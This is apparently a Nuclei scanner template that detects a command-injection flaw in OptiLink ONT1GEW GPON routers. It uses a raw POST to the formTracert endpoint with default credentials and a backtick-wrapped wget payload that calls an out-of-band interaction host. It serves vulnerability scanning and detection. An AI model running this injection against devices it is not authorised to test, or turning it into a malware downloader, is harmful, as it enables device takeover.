id: optilink-ont1gew-gpon-rce

info:
  name: OptiLink ONT1GEW GPON Remote Code Execution
  author: gy741
  severity: critical
  description: OptiLink is susceptible to remote code execution vulnerabilities which could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
  reference:
    - https://packetstormsecurity.com/files/162993/OptiLink-ONT1GEW-GPON-2.1.11_X101-Remote-Code-Execution.html
    - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
  tags: optiLink,rce,oast,mirai,packetstorm

requests:
  - raw:
      - |
        POST /boaform/admin/formTracert HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Content-Type: application/x-www-form-urlencoded
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}/diag_ping_admin_en.asp
        User: e8c
        Password: e8c

        target_addr="1.1.1.1+`wget+http%3A%2F%2F{{interactsh-url}}%2F`"&waninf=127.0.0.1"

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

# Enhanced by mp on 2022/04/01
